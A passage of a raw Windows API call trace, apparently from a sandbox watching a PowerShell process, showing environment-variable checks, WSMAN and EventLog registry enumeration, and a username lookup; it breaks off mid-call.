[0050.176] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0050.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.176] CoTaskMemFree (pv=0x1b852bb0) [0050.177] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0050.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.177] CoTaskMemFree (pv=0x1b852bb0) [0050.178] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0050.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.178] CoTaskMemFree (pv=0x1b852bb0) [0050.179] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0050.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.179] CoTaskMemFree (pv=0x1b852bb0) [0050.184] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0050.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.184] CoTaskMemFree (pv=0x1b852bb0) [0050.186] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0050.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.186] CoTaskMemFree (pv=0x1b852bb0) [0050.186] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0050.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.186] CoTaskMemFree (pv=0x1b852bb0) [0050.191] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d3dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d3d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d3dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d3d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.191] CoTaskMemFree (pv=0x0) [0050.191] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.191] RegEnumValueW (in: hKey=0x30c, dwIndex=0x0, lpValueName=0x43d430, lpcchValueName=0x26d488, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d488, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0050.191] CoTaskMemFree (pv=0x43d430) [0050.191] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.191] RegEnumValueW (in: hKey=0x30c, dwIndex=0x1, lpValueName=0x43d430, lpcchValueName=0x26d488, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d488, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0050.191] CoTaskMemFree (pv=0x43d430) [0050.191] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.191] RegEnumValueW (in: hKey=0x30c, dwIndex=0x2, lpValueName=0x43d430, lpcchValueName=0x26d488, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d488, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0050.192] CoTaskMemFree (pv=0x43d430) [0050.192] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d46c, lpData=0x0, lpcbData=0x26d468*=0x0 | out: lpType=0x26d46c*=0x1, lpData=0x0, lpcbData=0x26d468*=0x8) returned 0x0 [0050.192] CoTaskMemAlloc (cb=0xc) returned 0x1b875440 [0050.192] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d43c, lpData=0x1b875440, lpcbData=0x26d438*=0x8 | out: lpType=0x26d43c*=0x1, lpData="2.0", lpcbData=0x26d438*=0x8) returned 0x0 [0050.192] CoTaskMemFree (pv=0x1b875440) [0050.237] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d428 | out: phkResult=0x26d428*=0x310) returned 0x0 [0050.237] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d32c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d328, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d32c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d328*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.237] CoTaskMemFree (pv=0x0) [0050.237] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.237] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x43d430, lpcchValueName=0x26d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0050.238] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x43d430, lpcchValueName=0x26d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0050.238] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x43d430, lpcchValueName=0x26d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0050.238] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d3bc, lpData=0x0, lpcbData=0x26d3b8*=0x0 | out: lpType=0x26d3bc*=0x1, lpData=0x0, lpcbData=0x26d3b8*=0x8) returned 0x0 [0050.238] CoTaskMemAlloc (cb=0xc) returned 0x1b8752a0 [0050.238] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d38c, lpData=0x1b8752a0, lpcbData=0x26d388*=0x8 | out: lpType=0x26d38c*=0x1, lpData="2.0", lpcbData=0x26d388*=0x8) returned 0x0 [0050.238] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0050.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.245] CoTaskMemAlloc (cb=0x104) returned 0x1b852bb0 [0050.245] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b852bb0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0050.245] CoTaskMemFree (pv=0x1b852bb0) [0050.255] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d458 | out: phkResult=0x26d458*=0x324) returned 0x0 [0050.259] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d3cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d3c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d3cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d3c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.259] CoTaskMemFree (pv=0x0) [0050.260] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.260] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x43d430, lpcchName=0x26d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.260] CoTaskMemFree (pv=0x43d430) [0050.260] CoTaskMemFree (pv=0x0) [0050.260] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.260] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x1, lpName=0x43d430, lpcchName=0x26d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.260] CoTaskMemFree (pv=0x43d430) [0050.260] CoTaskMemFree (pv=0x0) [0050.260] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.260] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x2, lpName=0x43d430, lpcchName=0x26d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.260] CoTaskMemFree (pv=0x43d430) [0050.260] CoTaskMemFree (pv=0x0) [0050.260] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.260] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x3, lpName=0x43d430, lpcchName=0x26d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.260] CoTaskMemFree (pv=0x43d430) [0050.260] CoTaskMemFree (pv=0x0) [0050.260] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.260] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x4, lpName=0x43d430, lpcchName=0x26d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.260] CoTaskMemFree (pv=0x43d430) [0050.260] CoTaskMemFree (pv=0x0) [0050.260] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.260] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x5, lpName=0x43d430, lpcchName=0x26d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.260] CoTaskMemFree (pv=0x43d430) [0050.260] CoTaskMemFree (pv=0x0) [0050.260] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.260] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x6, lpName=0x43d430, lpcchName=0x26d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.260] CoTaskMemFree (pv=0x43d430) [0050.261] CoTaskMemFree (pv=0x0) [0050.261] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.261] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x7, lpName=0x43d430, lpcchName=0x26d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.261] CoTaskMemFree (pv=0x43d430) [0050.261] CoTaskMemFree (pv=0x0) [0050.261] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.261] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x8, lpName=0x43d430, lpcchName=0x26d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.261] CoTaskMemFree (pv=0x43d430) [0050.261] CoTaskMemFree (pv=0x0) [0050.261] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x334) returned 0x0 [0050.261] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x0) returned 0x2 [0050.261] RegOpenKeyExW (in: hKey=0x324, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x338) returned 0x0 [0050.261] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x0) returned 0x2 [0050.261] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x33c) returned 0x0 [0050.261] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x0) returned 0x2 [0050.262] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x340) returned 0x0 [0050.262] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x0) returned 0x2 [0050.262] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x344) returned 0x0 [0050.262] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x0) returned 0x2 [0050.262] RegOpenKeyExW (in: hKey=0x324, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x348) returned 0x0 [0050.262] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x0) returned 0x2 [0050.262] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d4b8 | out: phkResult=0x26d4b8*=0x0) returned 0x5 [0050.323] CoTaskMemAlloc (cb=0x804) returned 0x1b887fd0 [0050.323] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b887fd0, nSize=0x26d6c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x26d6c8) returned 0x1 [0050.324] CoTaskMemFree (pv=0x1b887fd0) [0050.325] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.325] GetUserNameW (in: lpBuffer=0x43d430, pcbBuffer=0x26d708 | out: lpBuffer="aETAdzjz", pcbBuffer=0x26d708) returned 1 [0050.325] CoTaskMemFree (pv=0x43d430) [0050.379] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d37c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d378, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d37c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d378*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.379] CoTaskMemFree (pv=0x0) [0050.379] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.379] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x0, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.379] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x1, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.379] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x2, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.379] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x3, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.379] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x4, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.379] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x5, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.379] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x6, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.379] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x7, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.380] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x8, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.392] RegOpenKeyExW (in: hKey=0x358, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x374) returned 0x0 [0050.392] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x0) returned 0x2 [0050.392] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x378) returned 0x0 [0050.392] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x37c) returned 0x0 [0050.393] RegCloseKey (hKey=0x37c) returned 0x0 [0050.393] RegCloseKey (hKey=0x358) returned 0x0 [0050.393] RegCloseKey (hKey=0x378) returned 0x0 [0050.394] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d408 | out: phkResult=0x26d408*=0x378) returned 0x0 [0050.394] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d37c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d378, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d37c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d378*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.394] CoTaskMemFree (pv=0x0) [0050.394] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.394] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.394] CoTaskMemFree (pv=0x43d430) [0050.394] CoTaskMemFree (pv=0x0) [0050.394] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.394] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.394] CoTaskMemFree (pv=0x43d430) [0050.394] CoTaskMemFree (pv=0x0) [0050.394] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.394] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.394] CoTaskMemFree (pv=0x43d430) [0050.394] CoTaskMemFree (pv=0x0) [0050.395] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.395] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.395] CoTaskMemFree (pv=0x43d430) [0050.395] CoTaskMemFree (pv=0x0) [0050.395] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.395] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.395] CoTaskMemFree (pv=0x43d430) [0050.395] CoTaskMemFree (pv=0x0) [0050.395] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.395] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.395] CoTaskMemFree (pv=0x43d430) [0050.395] CoTaskMemFree (pv=0x0) [0050.395] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.395] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.395] CoTaskMemFree (pv=0x43d430) [0050.395] CoTaskMemFree (pv=0x0) [0050.395] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.395] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.395] CoTaskMemFree (pv=0x43d430) [0050.395] CoTaskMemFree (pv=0x0) [0050.395] CoTaskMemAlloc (cb=0x204) returned 0x43d430 [0050.395] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x43d430, lpcchName=0x26d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x26d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0050.395] CoTaskMemFree (pv=0x43d430) [0050.395] CoTaskMemFree (pv=0x0) [0050.395] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x358) returned 0x0 [0050.396] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x0) returned 0x2 [0050.396] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x37c) returned 0x0 [0050.396] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x0) returned 0x2 [0050.396] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x380) returned 0x0 [0050.396] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x0) returned 0x2 [0050.396] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x384) returned 0x0 [0050.396] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x0) returned 0x2 [0050.396] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x388) returned 0x0 [0050.396] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x0) returned 0x2 [0050.397] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x38c) returned 0x0 [0050.397] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x0) returned 0x2 [0050.397] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x0) returned 0x5 [0050.407] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d468 | out: phkResult=0x26d468*=0x390) returned 0x0 [0050.407] RegOpenKeyExW (in: hKey=0x390, 